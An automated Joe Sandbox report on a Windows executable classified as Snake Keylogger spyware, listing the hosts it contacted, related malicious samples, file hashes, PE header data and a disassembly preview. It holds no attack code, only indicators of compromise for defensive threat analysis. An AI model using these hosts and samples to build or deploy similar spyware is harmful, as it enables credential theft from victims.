        http://reallyfreegeoip.orgPT98765445670009.scr.exe, 00000002.00000002.3688666945.0000000002EC0000.00000004.00000800.00020000.00000000.sdmp, PT98765445670009.scr.exe, 00000002.00000002.3688666945.0000000002F56000.00000004.00000800.00020000.00000000.sdmp, PT98765445670009.scr.exe, 00000002.00000002.3688666945.0000000002F64000.00000004.00000800.00020000.00000000.sdmp, PT98765445670009.scr.exe, 00000002.00000002.3688666945.0000000002F3B000.00000004.00000800.00020000.00000000.sdmp, PT98765445670009.scr.exe, 00000002.00000002.3688666945.0000000002FA0000.00000004.00000800.00020000.00000000.sdmp, PT98765445670009.scr.exe, 00000002.00000002.3688666945.0000000002F90000.00000004.00000800.00020000.00000000.sdmp, PT98765445670009.scr.exe, 00000002.00000002.3688666945.0000000002F48000.00000004.00000800.00020000.00000000.sdmpfalse
        • URL Reputation: safe
        		unknown
        https://reallyfreegeoip.orgPT98765445670009.scr.exe, 00000002.00000002.3688666945.0000000002F56000.00000004.00000800.00020000.00000000.sdmp, PT98765445670009.scr.exe, 00000002.00000002.3688666945.0000000002EA8000.00000004.00000800.00020000.00000000.sdmp, PT98765445670009.scr.exe, 00000002.00000002.3688666945.0000000002EEB000.00000004.00000800.00020000.00000000.sdmp, PT98765445670009.scr.exe, 00000002.00000002.3688666945.0000000002F64000.00000004.00000800.00020000.00000000.sdmp, PT98765445670009.scr.exe, 00000002.00000002.3688666945.0000000002F3B000.00000004.00000800.00020000.00000000.sdmp, PT98765445670009.scr.exe, 00000002.00000002.3688666945.0000000002FA0000.00000004.00000800.00020000.00000000.sdmp, PT98765445670009.scr.exe, 00000002.00000002.3688666945.0000000002F90000.00000004.00000800.00020000.00000000.sdmp, PT98765445670009.scr.exe, 00000002.00000002.3688666945.0000000002F48000.00000004.00000800.00020000.00000000.sdmpfalse
        • URL Reputation: safe
        		unknown
        http://checkip.dyndns.orgPT98765445670009.scr.exe, 00000002.00000002.3688666945.0000000002F56000.00000004.00000800.00020000.00000000.sdmp, PT98765445670009.scr.exe, 00000002.00000002.3688666945.0000000002EA8000.00000004.00000800.00020000.00000000.sdmp, PT98765445670009.scr.exe, 00000002.00000002.3688666945.0000000002F71000.00000004.00000800.00020000.00000000.sdmp, PT98765445670009.scr.exe, 00000002.00000002.3688666945.0000000002EEB000.00000004.00000800.00020000.00000000.sdmp, PT98765445670009.scr.exe, 00000002.00000002.3688666945.0000000002F64000.00000004.00000800.00020000.00000000.sdmp, PT98765445670009.scr.exe, 00000002.00000002.3688666945.0000000002F3B000.00000004.00000800.00020000.00000000.sdmp, PT98765445670009.scr.exe, 00000002.00000002.3688666945.0000000002FA0000.00000004.00000800.00020000.00000000.sdmp, PT98765445670009.scr.exe, 00000002.00000002.3688666945.0000000002F90000.00000004.00000800.00020000.00000000.sdmp, PT98765445670009.scr.exe, 00000002.00000002.3688666945.0000000002E99000.00000004.00000800.00020000.00000000.sdmp, PT98765445670009.scr.exe, 00000002.00000002.3688666945.0000000002F48000.00000004.00000800.00020000.00000000.sdmpfalse
        • URL Reputation: safe
        		unknown
        http://checkip.dyndns.comPT98765445670009.scr.exe, 00000002.00000002.3688666945.0000000002F56000.00000004.00000800.00020000.00000000.sdmp, PT98765445670009.scr.exe, 00000002.00000002.3688666945.0000000002EA8000.00000004.00000800.00020000.00000000.sdmp, PT98765445670009.scr.exe, 00000002.00000002.3688666945.0000000002F64000.00000004.00000800.00020000.00000000.sdmp, PT98765445670009.scr.exe, 00000002.00000002.3688666945.0000000002F3B000.00000004.00000800.00020000.00000000.sdmp, PT98765445670009.scr.exe, 00000002.00000002.3688666945.0000000002FA0000.00000004.00000800.00020000.00000000.sdmp, PT98765445670009.scr.exe, 00000002.00000002.3688666945.0000000002F90000.00000004.00000800.00020000.00000000.sdmp, PT98765445670009.scr.exe, 00000002.00000002.3688666945.0000000002F48000.00000004.00000800.00020000.00000000.sdmpfalse
        • URL Reputation: safe
        		unknown
        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namePT98765445670009.scr.exe, 00000002.00000002.3688666945.0000000002DE1000.00000004.00000800.00020000.00000000.sdmpfalse
          		high
          http://scratchdreams.tkPT98765445670009.scr.exe, 00000002.00000002.3688666945.0000000002FAE000.00000004.00000800.00020000.00000000.sdmpfalse
          • 6%, Virustotal, Browse
          • Avira URL Cloud: safe
          		unknown
          https://reallyfreegeoip.org/xml/PT98765445670009.scr.exe, 00000001.00000002.1240078291.0000000004034000.00000004.00000800.00020000.00000000.sdmp, PT98765445670009.scr.exe, 00000002.00000002.3688666945.0000000002EA8000.00000004.00000800.00020000.00000000.sdmp, PT98765445670009.scr.exe, 00000002.00000002.3682390166.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          		unknown

          World Map of Contacted IPs

          • No. of IPs < 25%
          • 25% < No. of IPs < 50%
          • 50% < No. of IPs < 75%
          • 75% < No. of IPs

          Public IPs

          IPDomainCountryFlagASNASN NameMalicious
          193.122.6.168
          		checkip.dyndns.comUnited States
          		31898ORACLE-BMC-31898USfalse
          172.67.177.134
          		reallyfreegeoip.orgUnited States
          		13335CLOUDFLARENETUSfalse
          104.21.27.85
          		scratchdreams.tkUnited States
          		13335CLOUDFLARENETUSfalse

          General Information

          Joe Sandbox version:40.0.0 Tourmaline
          Analysis ID:1416398
          Start date and time:2024-03-27 11:23:11 +01:00
          Joe Sandbox product:CloudBasic
          Overall analysis duration:0h 8m 15s
          Hypervisor based Inspection enabled:false
          Report type:full
          Cookbook file name:default.jbs
          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
          Number of analysed new started processes analysed:17
          Number of new started drivers analysed:0
          Number of existing processes analysed:0
          Number of existing drivers analysed:0
          Number of injected processes analysed:0
          Technologies:
          • HCA enabled
          • EGA enabled
          • AMSI enabled
          Analysis Mode:default
          Analysis stop reason:Timeout
          Sample name:PT98765445670009.scr.exe
          Detection:MAL
          Classification:mal100.troj.spyw.evad.winEXE@3/1@3/3
          EGA Information:
          • Successful, ratio: 100%
          HCA Information:
          • Successful, ratio: 97%
          • Number of executed functions: 106
          • Number of non-executed functions: 39
          Cookbook Comments:
          • Found application associated with file extension: .exe
          • Override analysis time to 240000 for current running targets taking high CPU consumption

          Warnings

          • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, MoUsoCoreWorker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
          • Not all processes where analyzed, report is missing behavior information
          • Report size getting too big, too many NtOpenKeyEx calls found.
          • Report size getting too big, too many NtQueryValueKey calls found.
          • Report size getting too big, too many NtReadVirtualMemory calls found.

          Simulations

          Behavior and APIs

          TimeTypeDescription
          11:24:04API Interceptor12232820x Sleep call for process: PT98765445670009.scr.exe modified

          Joe Sandbox View / Context

          IPs

          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          193.122.6.168SDTP098766700000.exeGet hashmaliciousSnake KeyloggerBrowse
          • checkip.dyndns.org/
          sipari#U015f formu_831512.exeGet hashmaliciousSnake KeyloggerBrowse
          • checkip.dyndns.org/
          PROFORMA FATURA.exeGet hashmaliciousSnake KeyloggerBrowse
          • checkip.dyndns.org/
          proforma_Invoice_0009300_74885959969_9876.exeGet hashmaliciousSnake KeyloggerBrowse
          • checkip.dyndns.org/
          SecuriteInfo.com.Trojan.PackedNET.2725.8730.30889.exeGet hashmaliciousSnake KeyloggerBrowse
          • checkip.dyndns.org/
          SecuriteInfo.com.Trojan.PackedNET.2725.27231.18654.exeGet hashmaliciousSnake KeyloggerBrowse
          • checkip.dyndns.org/
          SecuriteInfo.com.Trojan.PackedNET.2725.26841.22155.exeGet hashmaliciousSnake KeyloggerBrowse
          • checkip.dyndns.org/
          Bztahpxu.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
          • checkip.dyndns.org/
          Vessel Particulars.exeGet hashmaliciousSnake KeyloggerBrowse
          • checkip.dyndns.org/
          scan copy.jarGet hashmaliciousSnake KeyloggerBrowse
          • checkip.dyndns.org/
          172.67.177.1348wvP84hzFu.exeGet hashmaliciousSnake KeyloggerBrowse
            SDTP098766700000.exeGet hashmaliciousSnake KeyloggerBrowse
              sipari#U015f formu_831512.exeGet hashmaliciousSnake KeyloggerBrowse
                e-dekont.exeGet hashmaliciousSnake KeyloggerBrowse
                  PROFORMA FATURA.exeGet hashmaliciousSnake KeyloggerBrowse
                    xdd6BRIg0O.exeGet hashmaliciousPureLog Stealer, RedLine, Snake KeyloggerBrowse
                      Halkbank_Ekstre_20240312_081829_752731.exeGet hashmaliciousSnake KeyloggerBrowse
                        lO6Cysph34.exeGet hashmaliciousSnake KeyloggerBrowse
                          SecuriteInfo.com.Trojan.PackedNET.2725.1552.3502.exeGet hashmaliciousSnake KeyloggerBrowse
                            rTheRequestedReceipt.exeGet hashmaliciousSnake KeyloggerBrowse
                              104.21.27.858wvP84hzFu.exeGet hashmaliciousSnake KeyloggerBrowse
                                e-dekont.exeGet hashmaliciousSnake KeyloggerBrowse
                                  ATM Dekont E-Maili pdf.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                    Halkbank_Ekstre_20240312_081829_752731.exeGet hashmaliciousSnake KeyloggerBrowse
                                      Q88 09284823910.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                        SecuriteInfo.com.Trojan.PackedNET.2725.1552.3502.exeGet hashmaliciousSnake KeyloggerBrowse
                                          rTheRequestedReceipt.exeGet hashmaliciousSnake KeyloggerBrowse
                                            SecuriteInfo.com.Trojan.PackedNET.2725.27231.18654.exeGet hashmaliciousSnake KeyloggerBrowse
                                              https://focuscenter.com.br/SKMBT_27022024.tarGet hashmaliciousDarkTortilla, Snake KeyloggerBrowse

                                                Domains

                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                checkip.dyndns.com8wvP84hzFu.exeGet hashmaliciousSnake KeyloggerBrowse
                                                • 132.226.247.73
                                                SDTP098766700000.exeGet hashmaliciousSnake KeyloggerBrowse
                                                • 193.122.6.168
                                                sipari#U015f formu_831512.exeGet hashmaliciousSnake KeyloggerBrowse
                                                • 193.122.6.168
                                                23343100IM00270839_Dekont1.exeGet hashmaliciousSnake KeyloggerBrowse
                                                • 132.226.8.169
                                                e-dekont.exeGet hashmaliciousSnake KeyloggerBrowse
                                                • 158.101.44.242
                                                PROFORMA FATURA.exeGet hashmaliciousSnake KeyloggerBrowse
                                                • 193.122.6.168
                                                Payment_Draft_confirmation.xla.xlsxGet hashmaliciousSnake KeyloggerBrowse
                                                • 193.122.130.0
                                                e-dekont.exeGet hashmaliciousSnake KeyloggerBrowse
                                                • 193.122.130.0
                                                proforma_Invoice_0009300_74885959969_9876.exeGet hashmaliciousSnake KeyloggerBrowse
                                                • 193.122.6.168
                                                xdd6BRIg0O.exeGet hashmaliciousPureLog Stealer, RedLine, Snake KeyloggerBrowse
                                                • 132.226.247.73
                                                scratchdreams.tk8wvP84hzFu.exeGet hashmaliciousSnake KeyloggerBrowse
                                                • 104.21.27.85
                                                SDTP098766700000.exeGet hashmaliciousSnake KeyloggerBrowse
                                                • 172.67.169.18
                                                Payment_Draft_confirmation.xla.xlsxGet hashmaliciousSnake KeyloggerBrowse
                                                • 172.67.169.18
                                                e-dekont.exeGet hashmaliciousSnake KeyloggerBrowse
                                                • 104.21.27.85
                                                ATM Dekont E-Maili pdf.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                • 104.21.27.85
                                                Halkbank_Ekstre_20240312_081829_752731.exeGet hashmaliciousSnake KeyloggerBrowse
                                                • 104.21.27.85
                                                Q88 09284823910.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                • 104.21.27.85
                                                SecuriteInfo.com.Trojan.PackedNET.2725.1552.3502.exeGet hashmaliciousSnake KeyloggerBrowse
                                                • 104.21.27.85
                                                SecuriteInfo.com.Trojan.PackedNET.2725.8730.30889.exeGet hashmaliciousSnake KeyloggerBrowse
                                                • 172.67.169.18
                                                vessel details.exeGet hashmaliciousSnake KeyloggerBrowse
                                                • 172.67.169.18
                                                reallyfreegeoip.org8wvP84hzFu.exeGet hashmaliciousSnake KeyloggerBrowse
                                                • 172.67.177.134
                                                SDTP098766700000.exeGet hashmaliciousSnake KeyloggerBrowse
                                                • 172.67.177.134
                                                sipari#U015f formu_831512.exeGet hashmaliciousSnake KeyloggerBrowse
                                                • 172.67.177.134
                                                23343100IM00270839_Dekont1.exeGet hashmaliciousSnake KeyloggerBrowse
                                                • 104.21.67.152
                                                e-dekont.exeGet hashmaliciousSnake KeyloggerBrowse
                                                • 172.67.177.134
                                                PROFORMA FATURA.exeGet hashmaliciousSnake KeyloggerBrowse
                                                • 172.67.177.134
                                                Payment_Draft_confirmation.xla.xlsxGet hashmaliciousSnake KeyloggerBrowse
                                                • 104.21.67.152
                                                e-dekont.exeGet hashmaliciousSnake KeyloggerBrowse
                                                • 104.21.67.152
                                                proforma_Invoice_0009300_74885959969_9876.exeGet hashmaliciousSnake KeyloggerBrowse
                                                • 104.21.67.152
                                                xdd6BRIg0O.exeGet hashmaliciousPureLog Stealer, RedLine, Snake KeyloggerBrowse
                                                • 172.67.177.134

                                                ASNs

                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                ORACLE-BMC-31898USC0v8GOapdi.elfGet hashmaliciousMirai, OkiruBrowse
                                                • 129.147.194.25
                                                http://www.ibm.com/procurement/esiGet hashmaliciousUnknownBrowse
                                                • 132.145.172.253
                                                SOgv6zN9CC.exeGet hashmaliciousFormBook, PureLog Stealer, XWormBrowse
                                                • 168.138.211.88
                                                http://x.e.elmundo.es/ats/msg.aspx?sg1=307395850730fc0ad5a800fdddf65900Get hashmaliciousUnknownBrowse
                                                • 147.154.159.252
                                                97zyqEu4Nh.elfGet hashmaliciousMoobotBrowse
                                                • 150.136.209.246
                                                https://www.intermundial.es/blog/superpwa-sw.js?1711113962Get hashmaliciousUnknownBrowse
                                                • 130.35.103.62
                                                https://ioa.pages.dev/account/js-reporting/?crumb=uZ4.07kERLI&message=javascript_not_enabled&ref=%2Faccount%2Fchallenge%2FpasswordIP:Get hashmaliciousHTMLPhisherBrowse
                                                • 150.136.26.45
                                                https://trhj.pages.dev/IP:Get hashmaliciousHTMLPhisherBrowse
                                                • 193.122.128.135
                                                https://lanecain-homes.com/Get hashmaliciousUnknownBrowse
                                                • 193.122.130.38
                                                SDTP098766700000.exeGet hashmaliciousSnake KeyloggerBrowse
                                                • 193.122.6.168
                                                CLOUDFLARENETUShttp://www.munichsecurity.comGet hashmaliciousUnknownBrowse
                                                • 104.17.25.14
                                                https://acrobat.adobe.com/id/urn:aaid:sc:EU:c6e86077-ef65-4d67-a1ae-540c15f32abdGet hashmaliciousUnknownBrowse
                                                • 104.17.27.92
                                                new invoice.exeGet hashmaliciousAgentTeslaBrowse
                                                • 104.26.12.205
                                                #Play Voice Rec202401985.htmGet hashmaliciousHTMLPhisherBrowse
                                                • 104.17.24.14
                                                http://www.ibm.com/procurement/esiGet hashmaliciousUnknownBrowse
                                                • 104.18.89.228
                                                SecuriteInfo.com.Variant.Ser.MSILHeracles.1518.31245.9477.exeGet hashmaliciousAgentTeslaBrowse
                                                • 172.67.74.152
                                                0lujRkTbEG.jsGet hashmaliciousAgentTesla, PureLog Stealer, zgRATBrowse
                                                • 104.26.13.205
                                                RCP000004689 SWIFT COPY.exeGet hashmaliciousAgentTeslaBrowse
                                                • 172.67.74.152
                                                https://bafybeihog4kdcv6u7qpf5mt3zirrdjmanxqsehbx5xxarsugpzzybnhzr4.ipfs.cf-ipfs.com/don.html#csccomplaints@dvsa.gov.ukGet hashmaliciousHTMLPhisherBrowse
                                                • 104.18.11.207
                                                http://track.replies.force24.co.uk/f/a/Xcy9cOoiyUAgwEbReRRuqQ~~/AAAnTwA~/RgRn5F6jP0RlaHR0cHM6Ly94eC5sbmNvNS5zYS5jb20vZGRkZG9jdS9yYWJpbi9uaXFob3AvYUdWc2JHOUFZMjl0YlhNdWNtRmthWFZ6YVc1emRYSmhibU5sYzI5c2RYUnBiMjV6TG1OdmJRPT1XBXNwY2V1Qgpl_CMrA2aAxfjlUiFpbmZvQHJhZGl1c2luc3VyYW5jZXNvbHV0aW9ucy5jb21YBAAAAAQ~Get hashmaliciousHTMLPhisherBrowse
                                                • 172.67.139.119
                                                CLOUDFLARENETUShttp://www.munichsecurity.comGet hashmaliciousUnknownBrowse
                                                • 104.17.25.14
                                                https://acrobat.adobe.com/id/urn:aaid:sc:EU:c6e86077-ef65-4d67-a1ae-540c15f32abdGet hashmaliciousUnknownBrowse
                                                • 104.17.27.92
                                                new invoice.exeGet hashmaliciousAgentTeslaBrowse
                                                • 104.26.12.205
                                                #Play Voice Rec202401985.htmGet hashmaliciousHTMLPhisherBrowse
                                                • 104.17.24.14
                                                http://www.ibm.com/procurement/esiGet hashmaliciousUnknownBrowse
                                                • 104.18.89.228
                                                SecuriteInfo.com.Variant.Ser.MSILHeracles.1518.31245.9477.exeGet hashmaliciousAgentTeslaBrowse
                                                • 172.67.74.152
                                                0lujRkTbEG.jsGet hashmaliciousAgentTesla, PureLog Stealer, zgRATBrowse
                                                • 104.26.13.205
                                                RCP000004689 SWIFT COPY.exeGet hashmaliciousAgentTeslaBrowse
                                                • 172.67.74.152
                                                https://bafybeihog4kdcv6u7qpf5mt3zirrdjmanxqsehbx5xxarsugpzzybnhzr4.ipfs.cf-ipfs.com/don.html#csccomplaints@dvsa.gov.ukGet hashmaliciousHTMLPhisherBrowse
                                                • 104.18.11.207
                                                http://track.replies.force24.co.uk/f/a/Xcy9cOoiyUAgwEbReRRuqQ~~/AAAnTwA~/RgRn5F6jP0RlaHR0cHM6Ly94eC5sbmNvNS5zYS5jb20vZGRkZG9jdS9yYWJpbi9uaXFob3AvYUdWc2JHOUFZMjl0YlhNdWNtRmthWFZ6YVc1emRYSmhibU5sYzI5c2RYUnBiMjV6TG1OdmJRPT1XBXNwY2V1Qgpl_CMrA2aAxfjlUiFpbmZvQHJhZGl1c2luc3VyYW5jZXNvbHV0aW9ucy5jb21YBAAAAAQ~Get hashmaliciousHTMLPhisherBrowse
                                                • 172.67.139.119

                                                JA3 Fingerprints

                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                54328bd36c14bd82ddaa0c04b25ed9advHpxL6E2sQ.exeGet hashmaliciousLummaC, Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, PureLog Stealer, SmokeLoaderBrowse
                                                • 172.67.177.134
                                                PURCHASE_ORDER.jsGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
                                                • 172.67.177.134
                                                8wvP84hzFu.exeGet hashmaliciousSnake KeyloggerBrowse
                                                • 172.67.177.134
                                                SecuriteInfo.com.Win32.MalwareX-gen.21073.8844.exeGet hashmaliciousUnknownBrowse
                                                • 172.67.177.134
                                                SecuriteInfo.com.Win32.MalwareX-gen.21073.8844.exeGet hashmaliciousUnknownBrowse
                                                • 172.67.177.134
                                                WKn5bYRJGH.exeGet hashmaliciousLimeRATBrowse
                                                • 172.67.177.134
                                                https://docs.google.com/presentation/d/e/2PACX-1vSnrTuq809z4LSHZqJ8P3wAQ53C3bvUxFdD6jZcKbHNhhtXi1pH09I7Bs_0wQholvsfGmN1vz9cOMU8/pub?start=false&loop=false&delayms=3000&slide=id.pGet hashmaliciousUnknownBrowse
                                                • 172.67.177.134
                                                SDTP098766700000.exeGet hashmaliciousSnake KeyloggerBrowse
                                                • 172.67.177.134
                                                noDmpaxL0x.exeGet hashmaliciousBabuk, Djvu, Glupteba, SmokeLoader, Xehook StealerBrowse
                                                • 172.67.177.134
                                                doTtQFWKly.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, Glupteba, SmokeLoader, Vidar, Xehook StealerBrowse
                                                • 172.67.177.134
                                                3b5074b1b5d032e5620f69f9f700ff0enew invoice.exeGet hashmaliciousAgentTeslaBrowse
                                                • 104.21.27.85
                                                SecuriteInfo.com.Variant.Ser.MSILHeracles.1518.31245.9477.exeGet hashmaliciousAgentTeslaBrowse
                                                • 104.21.27.85
                                                0lujRkTbEG.jsGet hashmaliciousAgentTesla, PureLog Stealer, zgRATBrowse
                                                • 104.21.27.85
                                                RCP000004689 SWIFT COPY.exeGet hashmaliciousAgentTeslaBrowse
                                                • 104.21.27.85
                                                http://rocycheeks.comGet hashmaliciousUnknownBrowse
                                                • 104.21.27.85
                                                IN3 0GC-(94762)_489.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                • 104.21.27.85
                                                WRbiXjr77v.exeGet hashmaliciousPureLog Stealer, Xmrig, zgRATBrowse
                                                • 104.21.27.85
                                                SecuriteInfo.com.Win32.PWSX-gen.21299.5155.exeGet hashmaliciousAgentTeslaBrowse
                                                • 104.21.27.85
                                                MonKeyVPN1.0.9.exe.exeGet hashmaliciousMetasploitBrowse
                                                • 104.21.27.85
                                                MonKeyVPN1.0.9.exe.exeGet hashmaliciousMetasploitBrowse
                                                • 104.21.27.85

                                                Dropped Files

                                                No context

                                                Created / dropped Files

                                                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\PT98765445670009.scr.exe.log

                                                Download File
                                                Process:C:\Users\user\Desktop\PT98765445670009.scr.exe
                                                File Type:ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):706
                                                Entropy (8bit):5.349842958726647
                                                Encrypted:false
                                                SSDEEP:12:Q3La/KDLI4MWuPTAOKbbDLI4MWuPJKAVKharkvoDLI4MWuCq1KDLI4Mq92n4M6:ML9E4KlKDE4KhKiKhIE4Kx1qE4x84j
                                                MD5:A29F1F0983CFE0767B56BD3F32906196
                                                SHA1:A38543CAD5E151383FA945FF880856DC502A1224
                                                SHA-256:B892C3A6D2059FF69822E3A0003923BE0C0B2259C0E4904E30BB10C3D6E575F6
                                                SHA-512:FF52BC638E135EB070B6291808FE57FE8F2A37BB9F32DF2D6A885B30CC37268237A110E419975F19FB08878544787FA9D6A0AA07DC6911E08FBF52155F64DE42
                                                Malicious:false
                                                Reputation:moderate, very likely benign file
                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..

                                                Static File Info

                                                General

                                                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Entropy (8bit):7.2680634848839585
                                                TrID:
                                                • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                • Win32 Executable (generic) a (10002005/4) 49.75%
                                                • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                • Windows Screen Saver (13104/52) 0.07%
                                                • Generic Win/DOS Executable (2004/3) 0.01%
                                                File name:PT98765445670009.scr.exe
                                                File size:638'464 bytes
                                                MD5:90a34e7d570fa7c219eb5f1f193611ba
                                                SHA1:0d5d3955b04174b8f21c7bdd8d80ff21507e409c
                                                SHA256:301271b7db09d4769df8953807ea16c44578a4c4b92ef50f24da27c144f95522
                                                SHA512:75177b9ddf945e4dc46fb20174385faddfc569ea99cc095d1e1f9f4a96b9accc7dfcc1f6a1bd15d5740438e8ef63784ce870dfb3ea8d8c5387cc652324ace955
                                                SSDEEP:12288:npahc5sgNxUQx/rYquAfVCto8UHv/9EeRxDVl5nX:nZsgbFkq2tNUHDFVXX
                                                TLSH:AAD49D2033FC522AE2BF4B70E97940940BB6BE075EA6D35E489135DE0DB37818A53767
                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...#1................0.............n.... ........@.. ....................................@................................

                                                File Icon

                                                Icon Hash:526c6a52d0e4f047

                                                Static PE Info

                                                General

                                                Entrypoint:0x49bc6e
                                                Entrypoint Section:.text
                                                Digitally signed:false
                                                Imagebase:0x400000
                                                Subsystem:windows gui
                                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                Time Stamp:0xF9CC3123 [Sat Oct 21 21:18:27 2102 UTC]
                                                TLS Callbacks:
                                                CLR (.Net) Version:
                                                OS Version Major:4
                                                OS Version Minor:0
                                                File Version Major:4
                                                File Version Minor:0
                                                Subsystem Version Major:4
                                                Subsystem Version Minor:0
                                                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                Entrypoint Preview

                                                Instruction
                                                jmp dword ptr [00402000h]
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al

                                                Data Directories

                                                NameVirtual AddressVirtual Size Is in Section
                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x9bc1c0x4f.text
                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x9c0000x1b7c.rsrc
                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x9e0000xc.reloc
                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                Sections

                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
